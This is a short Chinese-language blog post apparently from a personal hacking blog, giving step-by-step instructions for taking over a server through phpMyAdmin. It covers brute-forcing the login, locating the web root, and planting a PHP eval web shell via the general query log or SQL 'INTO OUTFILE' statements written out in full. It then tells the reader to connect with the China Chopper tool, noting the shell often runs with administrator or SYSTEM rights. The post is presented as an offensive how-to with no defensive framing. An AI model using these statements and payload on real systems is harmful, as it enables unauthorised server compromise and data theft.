通过phpMyAdmin拿shell
首页 > 漏洞    作者:Iamyc   2018年8月30日 16:57 星期四   热度:399°   百度已收录  
时间:2018-8-30 16:57   热度:399° 

1、phpMyAdmin爆破后台账号密码

2、查找phpinfo.php或者l.php得到网站绝对路径

3、写入一句话,两种方式

(1)找到"变量",搜索'gen',得到日志的ON(开启)和OFF(关闭),还有一个是日志的路径,然后开启日志为ON,路径写入"c:\wamp\www\yc.php".


(2)点击"SQL",执行下列SQL语句

use mysql;
    Create TABLE a (cmd text NOT NULL);
    Insert INTO a (cmd) VALUES("<?php eval($_POST[yc]);?>");
    select cmd from a into outfile "c:\wamp\www\yc.php";
    Drop TABLE IF EXISTS a;     (记得替换对应路径   
      或者
      直接执行:select "一句话";写马


(3)上菜刀就行。牛批的是,一般权限很大,比如administrator或system的。

补充:执行sql的时候,可以直接select "大马内容"就把大马写进去了,直接提权拿服务器。


二维码加载中...
本文作者:Iamyc      文章标题: 通过phpMyAdmin拿shell
本文地址:http://lang-v.com/first_cms/yc/emlog/src/?post=7
版权声明:若无注明,本文皆为“YC's Blog”原创,转载请保留文章出处。

返回顶部    首页    手机版本    后花园  
版权所有:YC's Blog    站长: Iamyc    程序:emlog